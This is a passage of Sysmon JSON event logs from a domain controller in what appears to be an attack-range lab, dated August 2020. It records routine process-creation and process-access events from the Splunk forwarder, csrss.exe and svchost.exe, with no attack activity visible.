Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3395,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.960\r\nProcessGuid: {41C8662E-1FF4-5F25-0000-0010E96E0500}\r\nProcessId: 3892\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nParentProcessId: 2364\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.960","ProcessGuid":"{41C8662E-1FF4-5F25-0000-0010E96E0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010596B0500}","ParentProcessId":"2364","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3396,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nSourceProcessId: 2364\r\nSourceThreadId: 2176\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010E96E0500}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010596B0500}","SourceProcessId":"2364","SourceThreadId":"2176","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010E96E0500}","TargetProcessId":"3892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3397,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010E96E0500}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010E96E0500}","TargetProcessId":"3892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3398,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3399,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3400,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3401,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3402,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3403,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 